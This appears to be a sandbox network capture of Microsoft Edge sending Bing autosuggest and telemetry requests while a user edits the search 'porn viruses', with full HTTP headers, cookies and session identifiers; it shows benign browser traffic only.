UserAgentReductionOptOut: A7kgTC5xdZ2WIVGZEfb1hUoNuvjzOZX3VIV/BA6C18kQOOF50Q0D3oWoAm49k3BQImkujKILc7JmPysWk3CSjwUAAACMeyJvcmlnaW4iOiJodHRwczovL3d3dy5iaW5nLmNvbTo0NDMiLCJmZWF0dXJlIjoiU2VuZEZ1bGxVc2VyQWdlbnRBZnRlclJlZHVjdGlvbiIsImV4cGlyeSI6MTY4NDg4NjM5OSwiaXNTdWJkb21haW4iOnRydWUsImlzVGhpcmRQYXJ0eSI6dHJ1ZX0=
Content-Security-Policy: script-src https: 'strict-dynamic' 'report-sample' 'wasm-unsafe-eval' 'nonce-WfK0Tvrq8PptUegBrZ8QQQDsQAubuNj+T8gNCIbTYEw='; base-uri 'self';report-to csp-endpoint
Report-To: {"group":"csp-endpoint","max_age":86400,"endpoints":[{"url":"https://aefd.nelreports.net/api/report?cat=bingcsp"}]}
P3P: CP="NON UNI COM NAV STA LOC CURa DEVa PSAa PSDa OUR IND"
Date: Sat, 05 Oct 2024 16:05:36 GMT
Connection: keep-alive
Set-Cookie: _EDGE_S=F=1&SID=1FD780794ED66EF4059195764FF56FEA&mkt=nl-nl; domain=.bing.com; path=/; HttpOnly
Alt-Svc: h3=":443"; ma=93600
X-CDN-TraceID: 0.bf777b5c.1728144336.8b93996
GET

https://www.bing.com/AS/Suggestions?pt=page.serp&bq=porn+viruses&mkt=nl-nl&qry=porn%20v&cp=6&csr=1&msbqf=false&pths=1&cvid=0DD30F05AB304142B388EAD39E0E9879

msedge.exe

Remote address:

92.123.128.189:443

Request

GET /AS/Suggestions?pt=page.serp&bq=porn+viruses&mkt=nl-nl&qry=porn%20v&cp=6&csr=1&msbqf=false&pths=1&cvid=0DD30F05AB304142B388EAD39E0E9879 HTTP/1.1
Host: www.bing.com
Connection: keep-alive
sec-ch-ua: "Chromium";v="92", " Not A;Brand";v="99", "Microsoft Edge";v="92"
DNT: 1
sec-ch-ua-mobile: ?0
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/92.0.4515.131 Safari/537.36 Edg/92.0.902.67
sec-ch-ua-arch: "x86"
X-Autosuggest-ContentWidth: 650
sec-ch-ua-full-version: "92.0.902.67"
sec-ch-ua-platform-version: "10.0"
ect: 4g
sec-ch-ua-model:
sec-ch-ua-platform: "Windows"
Accept: */*
Sec-Fetch-Site: same-origin
Sec-Fetch-Mode: cors
Sec-Fetch-Dest: empty
Referer: https://www.bing.com/search?q=porn+viruses&cvid=b918b912aea0447dac6c3f982135f63c&aqs=edge..69i57.6285j0j4&FORM=ANAB01&PC=U531
Accept-Encoding: gzip, deflate, br
Accept-Language: en-US,en;q=0.9
Cookie: MUID=05879ADD3EF86D540F588FD23FDB6C78; _EDGE_V=1; SRCHS=PC=U531; SRCHD=AF=ANAB01; SRCHUID=V=2&GUID=1AF05D2DD4AB4219A140FE95E3A457CC&dmnchg=1; ak_bmsc=74116A38A2F084E1E43A26BF6C15EE40~000000000000000000000000000000~YAAQvXd7XOYY4kqSAQAAFr1tXRm1JniIRyh/3p+xj2CC8APwbuFJl8AZ0QOdGOYWvUNf1SkjmK1S2Q6qI60vy31DuGuEYXXk94vDVI1AqG5vUmM1VoynGYvEBI4eQU9fi+7yl2iSMaFc+k5OIaZW0sxl1bRdnR5e2QKu83RdE5Dhz8jkkGRnGdxoqYjgHbBZmTaEAD5bXQOH9Xyj8fzxOuxU30Dr3CNfUHUD67ViGx/IcQ55cCFHLN5BE5l/mLItR7YuJ3FeZFbRXHhVSokcv7QBoaLDevdd77hGTLaQaFZScZeSH6YrtjorItriSkCjfEfErGAfSfISonkpitsrqfvUUHqY85wayL6FwtHVAGdsEQlIyJ0sOPdtx/aF7FE=; MUIDB=05879ADD3EF86D540F588FD23FDB6C78; SRCHUSR=DOB=20241005&T=1728144325000; _C_ETH=1; _RwBf=r=0&ilt=1&ihpd=0&ispd=1&rc=3&rb=0&gb=0&rg=200&pc=0&mtu=0&rbb=0&g=0&cid=&clo=0&v=1&l=2024-10-05T07:00:00.0000000Z&lft=0001-01-01T00:00:00.0000000&aof=0&ard=0001-01-01T00:00:00.0000000&rwdbt=0&rwflt=0&rwaul2=0&o=2&p=&c=&t=0&s=0001-01-01T00:00:00.0000000+00:00&ts=2024-10-05T16:05:32.8363002+00:00&rwred=0&wls=&wlb=&wle=&ccp=&cpt=&lka=0&lkt=0&aad=0&TH=; _Rwho=u=d&ts=2024-10-05; _SS=PC=U531&SID=1FD780794ED66EF4059195764FF56FEA&R=3&RB=0&GB=0&RG=200&RP=0; SRCHHPGUSR=SRCHLANG=en&HV=1728144332&DM=0&BRW=M&BRH=S&CW=1280&CH=609&SCW=1263&SCH=498&DPR=1.0&UTC=0&PV=10.0; USRLOC=HS=1&BLOCK=TS=241005160532; _EDGE_S=F=1&SID=1FD780794ED66EF4059195764FF56FEA&mkt=nl-nl

Response

HTTP/1.1 200 OK

Content-Length: 80
Content-Type: application/json; charset=utf-8
Cache-Control: private, max-age=300
Content-Encoding: gzip
Vary: Accept-Encoding
X-EventID: 670163d0067c48e8942fb41641544d1e
X-AS-SetSessionMarket: nl-nl
Accept-CH: Sec-CH-UA-Bitness, Sec-CH-UA-Arch, Sec-CH-UA-Full-Version, Sec-CH-UA-Mobile, Sec-CH-UA-Model, Sec-CH-UA-Platform-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Platform, Sec-CH-UA, ECT, UA-Bitness, UA-Arch, UA-Full-Version, UA-Mobile, UA-Model, UA-Platform-Version, UA-Platform, UA
UserAgentReductionOptOut: A7kgTC5xdZ2WIVGZEfb1hUoNuvjzOZX3VIV/BA6C18kQOOF50Q0D3oWoAm49k3BQImkujKILc7JmPysWk3CSjwUAAACMeyJvcmlnaW4iOiJodHRwczovL3d3dy5iaW5nLmNvbTo0NDMiLCJmZWF0dXJlIjoiU2VuZEZ1bGxVc2VyQWdlbnRBZnRlclJlZHVjdGlvbiIsImV4cGlyeSI6MTY4NDg4NjM5OSwiaXNTdWJkb21haW4iOnRydWUsImlzVGhpcmRQYXJ0eSI6dHJ1ZX0=
Content-Security-Policy: script-src https: 'strict-dynamic' 'report-sample' 'wasm-unsafe-eval' 'nonce-0bHzDwSWIzuAMj1u9BY2YQjHausp1YUxZY3lRu1pHho='; base-uri 'self';report-to csp-endpoint
Report-To: {"group":"csp-endpoint","max_age":86400,"endpoints":[{"url":"https://aefd.nelreports.net/api/report?cat=bingcsp"}]}
P3P: CP="NON UNI COM NAV STA LOC CURa DEVa PSAa PSDa OUR IND"
Date: Sat, 05 Oct 2024 16:05:36 GMT
Connection: keep-alive
Set-Cookie: _EDGE_S=F=1&SID=1FD780794ED66EF4059195764FF56FEA&mkt=nl-nl; domain=.bing.com; path=/; HttpOnly
Alt-Svc: h3=":443"; ma=93600
X-CDN-TraceID: 0.bf777b5c.1728144336.8b93cec
GET

https://www.bing.com/AS/Suggestions?pt=page.serp&bq=porn+viruses&mkt=nl-nl&qry=porn%20&cp=5&csr=1&msbqf=false&pths=1&cvid=0DD30F05AB304142B388EAD39E0E9879

msedge.exe

Remote address:

92.123.128.189:443

Request

GET /AS/Suggestions?pt=page.serp&bq=porn+viruses&mkt=nl-nl&qry=porn%20&cp=5&csr=1&msbqf=false&pths=1&cvid=0DD30F05AB304142B388EAD39E0E9879 HTTP/1.1
Host: www.bing.com
Connection: keep-alive
sec-ch-ua: "Chromium";v="92", " Not A;Brand";v="99", "Microsoft Edge";v="92"
DNT: 1
sec-ch-ua-mobile: ?0
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/92.0.4515.131 Safari/537.36 Edg/92.0.902.67
sec-ch-ua-arch: "x86"
X-Autosuggest-ContentWidth: 650
sec-ch-ua-full-version: "92.0.902.67"
sec-ch-ua-platform-version: "10.0"
ect: 4g
sec-ch-ua-model:
sec-ch-ua-platform: "Windows"
Accept: */*
Sec-Fetch-Site: same-origin
Sec-Fetch-Mode: cors
Sec-Fetch-Dest: empty
Referer: https://www.bing.com/search?q=porn+viruses&cvid=b918b912aea0447dac6c3f982135f63c&aqs=edge..69i57.6285j0j4&FORM=ANAB01&PC=U531
Accept-Encoding: gzip, deflate, br
Accept-Language: en-US,en;q=0.9
Cookie: MUID=05879ADD3EF86D540F588FD23FDB6C78; _EDGE_V=1; SRCHS=PC=U531; SRCHD=AF=ANAB01; SRCHUID=V=2&GUID=1AF05D2DD4AB4219A140FE95E3A457CC&dmnchg=1; ak_bmsc=74116A38A2F084E1E43A26BF6C15EE40~000000000000000000000000000000~YAAQvXd7XOYY4kqSAQAAFr1tXRm1JniIRyh/3p+xj2CC8APwbuFJl8AZ0QOdGOYWvUNf1SkjmK1S2Q6qI60vy31DuGuEYXXk94vDVI1AqG5vUmM1VoynGYvEBI4eQU9fi+7yl2iSMaFc+k5OIaZW0sxl1bRdnR5e2QKu83RdE5Dhz8jkkGRnGdxoqYjgHbBZmTaEAD5bXQOH9Xyj8fzxOuxU30Dr3CNfUHUD67ViGx/IcQ55cCFHLN5BE5l/mLItR7YuJ3FeZFbRXHhVSokcv7QBoaLDevdd77hGTLaQaFZScZeSH6YrtjorItriSkCjfEfErGAfSfISonkpitsrqfvUUHqY85wayL6FwtHVAGdsEQlIyJ0sOPdtx/aF7FE=; MUIDB=05879ADD3EF86D540F588FD23FDB6C78; SRCHUSR=DOB=20241005&T=1728144325000; _C_ETH=1; _RwBf=r=0&ilt=1&ihpd=0&ispd=1&rc=3&rb=0&gb=0&rg=200&pc=0&mtu=0&rbb=0&g=0&cid=&clo=0&v=1&l=2024-10-05T07:00:00.0000000Z&lft=0001-01-01T00:00:00.0000000&aof=0&ard=0001-01-01T00:00:00.0000000&rwdbt=0&rwflt=0&rwaul2=0&o=2&p=&c=&t=0&s=0001-01-01T00:00:00.0000000+00:00&ts=2024-10-05T16:05:32.8363002+00:00&rwred=0&wls=&wlb=&wle=&ccp=&cpt=&lka=0&lkt=0&aad=0&TH=; _Rwho=u=d&ts=2024-10-05; _SS=PC=U531&SID=1FD780794ED66EF4059195764FF56FEA&R=3&RB=0&GB=0&RG=200&RP=0; SRCHHPGUSR=SRCHLANG=en&HV=1728144332&DM=0&BRW=M&BRH=S&CW=1280&CH=609&SCW=1263&SCH=498&DPR=1.0&UTC=0&PV=10.0; USRLOC=HS=1&BLOCK=TS=241005160532; _EDGE_S=F=1&SID=1FD780794ED66EF4059195764FF56FEA&mkt=nl-nl

Response

HTTP/1.1 200 OK

Content-Length: 513
Content-Type: application/json; charset=utf-8
Cache-Control: private, max-age=300
Content-Encoding: gzip
Vary: Accept-Encoding
X-EventID: 670163d1538a4251befda0c7a6721368
X-AS-SetSessionMarket: nl-nl
Accept-CH: Sec-CH-UA-Bitness, Sec-CH-UA-Arch, Sec-CH-UA-Full-Version, Sec-CH-UA-Mobile, Sec-CH-UA-Model, Sec-CH-UA-Platform-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Platform, Sec-CH-UA, ECT, UA-Bitness, UA-Arch, UA-Full-Version, UA-Mobile, UA-Model, UA-Platform-Version, UA-Platform, UA
UserAgentReductionOptOut: A7kgTC5xdZ2WIVGZEfb1hUoNuvjzOZX3VIV/BA6C18kQOOF50Q0D3oWoAm49k3BQImkujKILc7JmPysWk3CSjwUAAACMeyJvcmlnaW4iOiJodHRwczovL3d3dy5iaW5nLmNvbTo0NDMiLCJmZWF0dXJlIjoiU2VuZEZ1bGxVc2VyQWdlbnRBZnRlclJlZHVjdGlvbiIsImV4cGlyeSI6MTY4NDg4NjM5OSwiaXNTdWJkb21haW4iOnRydWUsImlzVGhpcmRQYXJ0eSI6dHJ1ZX0=
Content-Security-Policy: script-src https: 'strict-dynamic' 'report-sample' 'wasm-unsafe-eval' 'nonce-doygBj8gXUNdeI6gf6Mv7+CL7LmPS82Hfw4fIALNyx4='; base-uri 'self';report-to csp-endpoint
Report-To: {"group":"csp-endpoint","max_age":86400,"endpoints":[{"url":"https://aefd.nelreports.net/api/report?cat=bingcsp"}]}
P3P: CP="NON UNI COM NAV STA LOC CURa DEVa PSAa PSDa OUR IND"
Date: Sat, 05 Oct 2024 16:05:37 GMT
Connection: keep-alive
Set-Cookie: _EDGE_S=F=1&SID=1FD780794ED66EF4059195764FF56FEA&mkt=nl-nl; domain=.bing.com; path=/; HttpOnly
Alt-Svc: h3=":443"; ma=93600
X-CDN-TraceID: 0.bf777b5c.1728144337.8b9406c
GET

https://www.bing.com/AS/Suggestions?pt=page.serp&bq=porn+viruses&mkt=nl-nl&qry=porn&cp=4&csr=1&msbqf=false&pths=1&cvid=0DD30F05AB304142B388EAD39E0E9879

msedge.exe

Remote address:

92.123.128.189:443

Request

GET /AS/Suggestions?pt=page.serp&bq=porn+viruses&mkt=nl-nl&qry=porn&cp=4&csr=1&msbqf=false&pths=1&cvid=0DD30F05AB304142B388EAD39E0E9879 HTTP/1.1
Host: www.bing.com
Connection: keep-alive
sec-ch-ua: "Chromium";v="92", " Not A;Brand";v="99", "Microsoft Edge";v="92"
DNT: 1
sec-ch-ua-mobile: ?0
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/92.0.4515.131 Safari/537.36 Edg/92.0.902.67
sec-ch-ua-arch: "x86"
X-Autosuggest-ContentWidth: 650
sec-ch-ua-full-version: "92.0.902.67"
sec-ch-ua-platform-version: "10.0"
ect: 4g
sec-ch-ua-model:
sec-ch-ua-platform: "Windows"
Accept: */*
Sec-Fetch-Site: same-origin
Sec-Fetch-Mode: cors
Sec-Fetch-Dest: empty
Referer: https://www.bing.com/search?q=porn+viruses&cvid=b918b912aea0447dac6c3f982135f63c&aqs=edge..69i57.6285j0j4&FORM=ANAB01&PC=U531
Accept-Encoding: gzip, deflate, br
Accept-Language: en-US,en;q=0.9
Cookie: MUID=05879ADD3EF86D540F588FD23FDB6C78; _EDGE_V=1; SRCHS=PC=U531; SRCHD=AF=ANAB01; SRCHUID=V=2&GUID=1AF05D2DD4AB4219A140FE95E3A457CC&dmnchg=1; ak_bmsc=74116A38A2F084E1E43A26BF6C15EE40~000000000000000000000000000000~YAAQvXd7XOYY4kqSAQAAFr1tXRm1JniIRyh/3p+xj2CC8APwbuFJl8AZ0QOdGOYWvUNf1SkjmK1S2Q6qI60vy31DuGuEYXXk94vDVI1AqG5vUmM1VoynGYvEBI4eQU9fi+7yl2iSMaFc+k5OIaZW0sxl1bRdnR5e2QKu83RdE5Dhz8jkkGRnGdxoqYjgHbBZmTaEAD5bXQOH9Xyj8fzxOuxU30Dr3CNfUHUD67ViGx/IcQ55cCFHLN5BE5l/mLItR7YuJ3FeZFbRXHhVSokcv7QBoaLDevdd77hGTLaQaFZScZeSH6YrtjorItriSkCjfEfErGAfSfISonkpitsrqfvUUHqY85wayL6FwtHVAGdsEQlIyJ0sOPdtx/aF7FE=; MUIDB=05879ADD3EF86D540F588FD23FDB6C78; SRCHUSR=DOB=20241005&T=1728144325000; _C_ETH=1; _RwBf=r=0&ilt=1&ihpd=0&ispd=1&rc=3&rb=0&gb=0&rg=200&pc=0&mtu=0&rbb=0&g=0&cid=&clo=0&v=1&l=2024-10-05T07:00:00.0000000Z&lft=0001-01-01T00:00:00.0000000&aof=0&ard=0001-01-01T00:00:00.0000000&rwdbt=0&rwflt=0&rwaul2=0&o=2&p=&c=&t=0&s=0001-01-01T00:00:00.0000000+00:00&ts=2024-10-05T16:05:32.8363002+00:00&rwred=0&wls=&wlb=&wle=&ccp=&cpt=&lka=0&lkt=0&aad=0&TH=; _Rwho=u=d&ts=2024-10-05; _SS=PC=U531&SID=1FD780794ED66EF4059195764FF56FEA&R=3&RB=0&GB=0&RG=200&RP=0; SRCHHPGUSR=SRCHLANG=en&HV=1728144332&DM=0&BRW=M&BRH=S&CW=1280&CH=609&SCW=1263&SCH=498&DPR=1.0&UTC=0&PV=10.0; USRLOC=HS=1&BLOCK=TS=241005160532; _EDGE_S=F=1&SID=1FD780794ED66EF4059195764FF56FEA&mkt=nl-nl

Response

HTTP/1.1 200 OK

Content-Length: 699
Content-Type: application/json; charset=utf-8
Cache-Control: private, max-age=300
Content-Encoding: gzip
Vary: Accept-Encoding
X-EventID: 670163d1bbe0455bb452564660ad7995
X-AS-SetSessionMarket: nl-nl
Accept-CH: Sec-CH-UA-Bitness, Sec-CH-UA-Arch, Sec-CH-UA-Full-Version, Sec-CH-UA-Mobile, Sec-CH-UA-Model, Sec-CH-UA-Platform-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Platform, Sec-CH-UA, ECT, UA-Bitness, UA-Arch, UA-Full-Version, UA-Mobile, UA-Model, UA-Platform-Version, UA-Platform, UA
UserAgentReductionOptOut: A7kgTC5xdZ2WIVGZEfb1hUoNuvjzOZX3VIV/BA6C18kQOOF50Q0D3oWoAm49k3BQImkujKILc7JmPysWk3CSjwUAAACMeyJvcmlnaW4iOiJodHRwczovL3d3dy5iaW5nLmNvbTo0NDMiLCJmZWF0dXJlIjoiU2VuZEZ1bGxVc2VyQWdlbnRBZnRlclJlZHVjdGlvbiIsImV4cGlyeSI6MTY4NDg4NjM5OSwiaXNTdWJkb21haW4iOnRydWUsImlzVGhpcmRQYXJ0eSI6dHJ1ZX0=
Content-Security-Policy: script-src https: 'strict-dynamic' 'report-sample' 'wasm-unsafe-eval' 'nonce-K724IO2Hmla2l5TatoJZesEOr11vz1CnmIj0cpklwXE='; base-uri 'self';report-to csp-endpoint
Report-To: {"group":"csp-endpoint","max_age":86400,"endpoints":[{"url":"https://aefd.nelreports.net/api/report?cat=bingcsp"}]}
P3P: CP="NON UNI COM NAV STA LOC CURa DEVa PSAa PSDa OUR IND"
Date: Sat, 05 Oct 2024 16:05:37 GMT
Connection: keep-alive
Set-Cookie: _EDGE_S=F=1&SID=1FD780794ED66EF4059195764FF56FEA&mkt=nl-nl; domain=.bing.com; path=/; HttpOnly
Alt-Svc: h3=":443"; ma=93600
X-CDN-TraceID: 0.bf777b5c.1728144337.8b942d1
GET

https://www.bing.com/AS/Suggestions?pt=page.serp&bq=porn+viruses&mkt=nl-nl&qry=&cp=0&csr=1&msbqf=false&pths=1&cvid=0DD30F05AB304142B388EAD39E0E9879

msedge.exe

Remote address:

92.123.128.189:443

Request

GET /AS/Suggestions?pt=page.serp&bq=porn+viruses&mkt=nl-nl&qry=&cp=0&csr=1&msbqf=false&pths=1&cvid=0DD30F05AB304142B388EAD39E0E9879 HTTP/1.1
Host: www.bing.com
Connection: keep-alive
sec-ch-ua: "Chromium";v="92", " Not A;Brand";v="99", "Microsoft Edge";v="92"
DNT: 1
sec-ch-ua-mobile: ?0
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/92.0.4515.131 Safari/537.36 Edg/92.0.902.67
sec-ch-ua-arch: "x86"
X-Autosuggest-ContentWidth: 650
sec-ch-ua-full-version: "92.0.902.67"
sec-ch-ua-platform-version: "10.0"
ect: 4g
sec-ch-ua-model:
sec-ch-ua-platform: "Windows"
Accept: */*
Sec-Fetch-Site: same-origin
Sec-Fetch-Mode: cors
Sec-Fetch-Dest: empty
Referer: https://www.bing.com/search?q=porn+viruses&cvid=b918b912aea0447dac6c3f982135f63c&aqs=edge..69i57.6285j0j4&FORM=ANAB01&PC=U531
Accept-Encoding: gzip, deflate, br
Accept-Language: en-US,en;q=0.9
Cookie: MUID=05879ADD3EF86D540F588FD23FDB6C78; _EDGE_V=1; SRCHS=PC=U531; SRCHD=AF=ANAB01; SRCHUID=V=2&GUID=1AF05D2DD4AB4219A140FE95E3A457CC&dmnchg=1; ak_bmsc=74116A38A2F084E1E43A26BF6C15EE40~000000000000000000000000000000~YAAQvXd7XOYY4kqSAQAAFr1tXRm1JniIRyh/3p+xj2CC8APwbuFJl8AZ0QOdGOYWvUNf1SkjmK1S2Q6qI60vy31DuGuEYXXk94vDVI1AqG5vUmM1VoynGYvEBI4eQU9fi+7yl2iSMaFc+k5OIaZW0sxl1bRdnR5e2QKu83RdE5Dhz8jkkGRnGdxoqYjgHbBZmTaEAD5bXQOH9Xyj8fzxOuxU30Dr3CNfUHUD67ViGx/IcQ55cCFHLN5BE5l/mLItR7YuJ3FeZFbRXHhVSokcv7QBoaLDevdd77hGTLaQaFZScZeSH6YrtjorItriSkCjfEfErGAfSfISonkpitsrqfvUUHqY85wayL6FwtHVAGdsEQlIyJ0sOPdtx/aF7FE=; MUIDB=05879ADD3EF86D540F588FD23FDB6C78; SRCHUSR=DOB=20241005&T=1728144325000; _C_ETH=1; _RwBf=r=0&ilt=1&ihpd=0&ispd=1&rc=3&rb=0&gb=0&rg=200&pc=0&mtu=0&rbb=0&g=0&cid=&clo=0&v=1&l=2024-10-05T07:00:00.0000000Z&lft=0001-01-01T00:00:00.0000000&aof=0&ard=0001-01-01T00:00:00.0000000&rwdbt=0&rwflt=0&rwaul2=0&o=2&p=&c=&t=0&s=0001-01-01T00:00:00.0000000+00:00&ts=2024-10-05T16:05:32.8363002+00:00&rwred=0&wls=&wlb=&wle=&ccp=&cpt=&lka=0&lkt=0&aad=0&TH=; _Rwho=u=d&ts=2024-10-05; _SS=PC=U531&SID=1FD780794ED66EF4059195764FF56FEA&R=3&RB=0&GB=0&RG=200&RP=0; SRCHHPGUSR=SRCHLANG=en&HV=1728144332&DM=0&BRW=M&BRH=S&CW=1280&CH=609&SCW=1263&SCH=498&DPR=1.0&UTC=0&PV=10.0; USRLOC=HS=1&BLOCK=TS=241005160532; _EDGE_S=F=1&SID=1FD780794ED66EF4059195764FF56FEA&mkt=nl-nl

Response

HTTP/1.1 200 OK

Content-Length: 1031
Content-Type: application/json; charset=utf-8
Cache-Control: private, max-age=300
Content-Encoding: gzip
Vary: Accept-Encoding
X-EventID: 670163d10e184a5fbd84e816d6ee5d2d
X-AS-SetSessionMarket: nl-nl
Accept-CH: Sec-CH-UA-Bitness, Sec-CH-UA-Arch, Sec-CH-UA-Full-Version, Sec-CH-UA-Mobile, Sec-CH-UA-Model, Sec-CH-UA-Platform-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Platform, Sec-CH-UA, ECT, UA-Bitness, UA-Arch, UA-Full-Version, UA-Mobile, UA-Model, UA-Platform-Version, UA-Platform, UA
UserAgentReductionOptOut: A7kgTC5xdZ2WIVGZEfb1hUoNuvjzOZX3VIV/BA6C18kQOOF50Q0D3oWoAm49k3BQImkujKILc7JmPysWk3CSjwUAAACMeyJvcmlnaW4iOiJodHRwczovL3d3dy5iaW5nLmNvbTo0NDMiLCJmZWF0dXJlIjoiU2VuZEZ1bGxVc2VyQWdlbnRBZnRlclJlZHVjdGlvbiIsImV4cGlyeSI6MTY4NDg4NjM5OSwiaXNTdWJkb21haW4iOnRydWUsImlzVGhpcmRQYXJ0eSI6dHJ1ZX0=
Content-Security-Policy: script-src https: 'strict-dynamic' 'report-sample' 'wasm-unsafe-eval' 'nonce-48sTRcRwLudd7WKhHsQau/yQDl9FMpkzhEDcx+3RqAI='; base-uri 'self';report-to csp-endpoint
Report-To: {"group":"csp-endpoint","max_age":86400,"endpoints":[{"url":"https://aefd.nelreports.net/api/report?cat=bingcsp"}]}
P3P: CP="NON UNI COM NAV STA LOC CURa DEVa PSAa PSDa OUR IND"
Date: Sat, 05 Oct 2024 16:05:37 GMT
Connection: keep-alive
Set-Cookie: _EDGE_S=F=1&SID=1FD780794ED66EF4059195764FF56FEA&mkt=nl-nl; domain=.bing.com; path=/; HttpOnly
Alt-Svc: h3=":443"; ma=93600
X-CDN-TraceID: 0.bf777b5c.1728144337.8b94684
GET

https://www.bing.com/fd/ls/l?IG=0DD30F05AB304142B388EAD39E0E9879&CID=05879ADD3EF86D540F588FD23FDB6C78&TYPE=Event.ClientInst&DATA=%5B%7B%22Meta%22%3A%22q%3Apor%2Ci%3A9%22%2C%22T%22%3A%22CI.Change%22%2C%22TS%22%3A1728144336955%2C%22Name%22%3A%22PerfInst%22%2C%22FID%22%3A%22AS%22%7D%2C%7B%22Meta%22%3A%22q%3Apor%2Ci%3A9%22%2C%22T%22%3A%22CI.Request%22%2C%22TS%22%3A1728144336991%2C%22Name%22%3A%22PerfInst%22%2C%22FID%22%3A%22AS%22%7D%2C%7B%22Meta%22%3A%22q%3Apo%2Ci%3A10%22%2C%22T%22%3A%22CI.Change%22%2C%22TS%22%3A1728144337015%2C%22Name%22%3A%22PerfInst%22%2C%22FID%22%3A%22AS%22%7D%2C%7B%22Meta%22%3A%22q%3Apo%2Ci%3A10%22%2C%22T%22%3A%22CI.Request%22%2C%22TS%22%3A1728144337052%2C%22Name%22%3A%22PerfInst%22%2C%22FID%22%3A%22AS%22%7D%2C%7B%22Meta%22%3A%22q%3Ap%2Ci%3A11%22%2C%22T%22%3A%22CI.Change%22%2C%22TS%22%3A1728144337060%2C%22Name%22%3A%22PerfInst%22%2C%22FID%22%3A%22AS%22%7D%2C%7B%22Meta%22%3A%22q%3A%2Ci%3A12%22%2C%22T%22%3A%22CI.Change%22%2C%22TS%22%3A1728144337102%2C%22Name%22%3A%22PerfInst%22%2C%22FID%22%3A%22AS%22%7D%2C%7B%22Meta%22%3A%22q%3A%2Ci%3A11%22%2C%22T%22%3A%22CI.Request%22%2C%22TS%22%3A1728144337106%2C%22Name%22%3A%22PerfInst%22%2C%22FID%22%3A%22AS%22%7D%2C%7B%22Meta%22%3A%22q%3Aporn%2Ci%3A8%22%2C%22AsResponseLength%22%3A%22699%22%2C%22T%22%3A%22CI.Load%22%2C%22TS%22%3A1728144337106%2C%22Name%22%3A%22PerfInst%22%2C%22FID%22%3A%22AS%22%7D%2C%7B%22Meta%22%3A%22q%3A%2Ci%3A8%2Cig%3AD90AA2D2C3B546C59906675777350E15%22%2C%22AnswerInfo%22%3A%22AS%3B22%22%2C%22T%22%3A%22CI.Show%22%2C%22TS%22%3A1728144337106%2C%22Name%22%3A%22PerfInst%22%2C%22FID%22%3A%22AS%22%7D%2C%7B%22Meta%22%3A%22q%3Apo%2Ci%3A10%22%2C%22AsResponseLength%22%3A%22845%22%2C%22T%22%3A%22CI.Load%22%2C%22TS%22%3A1728144337186%2C%22Name%22%3A%22PerfInst%22%2C%22FID%22%3A%22AS%22%7D%2C%7B%22Meta%22%3A%22q%3A%2Ci%3A10%2Cig%3ABB3C438218B14E40A7C7F8A61F219E36%22%2C%22AnswerInfo%22%3A%22AS%3B4%22%2C%22T%22%3A%22CI.Show%22%2C%22TS%22%3A1728144337187%2C%22Name%22%3A%22PerfInst%22%2C%22FID%22%3A%22AS%22%7D%5D

msedge.exe

Remote address:

92.123.128.189:443

Request

GET /fd/ls/l?IG=0DD30F05AB304142B388EAD39E0E9879&CID=05879ADD3EF86D540F588FD23FDB6C78&TYPE=Event.ClientInst&DATA=%5B%7B%22Meta%22%3A%22q%3Apor%2Ci%3A9%22%2C%22T%22%3A%22CI.Change%22%2C%22TS%22%3A1728144336955%2C%22Name%22%3A%22PerfInst%22%2C%22FID%22%3A%22AS%22%7D%2C%7B%22Meta%22%3A%22q%3Apor%2Ci%3A9%22%2C%22T%22%3A%22CI.Request%22%2C%22TS%22%3A1728144336991%2C%22Name%22%3A%22PerfInst%22%2C%22FID%22%3A%22AS%22%7D%2C%7B%22Meta%22%3A%22q%3Apo%2Ci%3A10%22%2C%22T%22%3A%22CI.Change%22%2C%22TS%22%3A1728144337015%2C%22Name%22%3A%22PerfInst%22%2C%22FID%22%3A%22AS%22%7D%2C%7B%22Meta%22%3A%22q%3Apo%2Ci%3A10%22%2C%22T%22%3A%22CI.Request%22%2C%22TS%22%3A1728144337052%2C%22Name%22%3A%22PerfInst%22%2C%22FID%22%3A%22AS%22%7D%2C%7B%22Meta%22%3A%22q%3Ap%2Ci%3A11%22%2C%22T%22%3A%22CI.Change%22%2C%22TS%22%3A1728144337060%2C%22Name%22%3A%22PerfInst%22%2C%22FID%22%3A%22AS%22%7D%2C%7B%22Meta%22%3A%22q%3A%2Ci%3A12%22%2C%22T%22%3A%22CI.Change%22%2C%22TS%22%3A1728144337102%2C%22Name%22%3A%22PerfInst%22%2C%22FID%22%3A%22AS%22%7D%2C%7B%22Meta%22%3A%22q%3A%2Ci%3A11%22%2C%22T%22%3A%22CI.Request%22%2C%22TS%22%3A1728144337106%2C%22Name%22%3A%22PerfInst%22%2C%22FID%22%3A%22AS%22%7D%2C%7B%22Meta%22%3A%22q%3Aporn%2Ci%3A8%22%2C%22AsResponseLength%22%3A%22699%22%2C%22T%22%3A%22CI.Load%22%2C%22TS%22%3A1728144337106%2C%22Name%22%3A%22PerfInst%22%2C%22FID%22%3A%22AS%22%7D%2C%7B%22Meta%22%3A%22q%3A%2Ci%3A8%2Cig%3AD90AA2D2C3B546C59906675777350E15%22%2C%22AnswerInfo%22%3A%22AS%3B22%22%2C%22T%22%3A%22CI.Show%22%2C%22TS%22%3A1728144337106%2C%22Name%22%3A%22PerfInst%22%2C%22FID%22%3A%22AS%22%7D%2C%7B%22Meta%22%3A%22q%3Apo%2Ci%3A10%22%2C%22AsResponseLength%22%3A%22845%22%2C%22T%22%3A%22CI.Load%22%2C%22TS%22%3A1728144337186%2C%22Name%22%3A%22PerfInst%22%2C%22FID%22%3A%22AS%22%7D%2C%7B%22Meta%22%3A%22q%3A%2Ci%3A10%2Cig%3ABB3C438218B14E40A7C7F8A61F219E36%22%2C%22AnswerInfo%22%3A%22AS%3B4%22%2C%22T%22%3A%22CI.Show%22%2C%22TS%22%3A1728144337187%2C%22Name%22%3A%22PerfInst%22%2C%22FID%22%3A%22AS%22%7D%5D HTTP/1.1
Host: www.bing.com
Connection: keep-alive
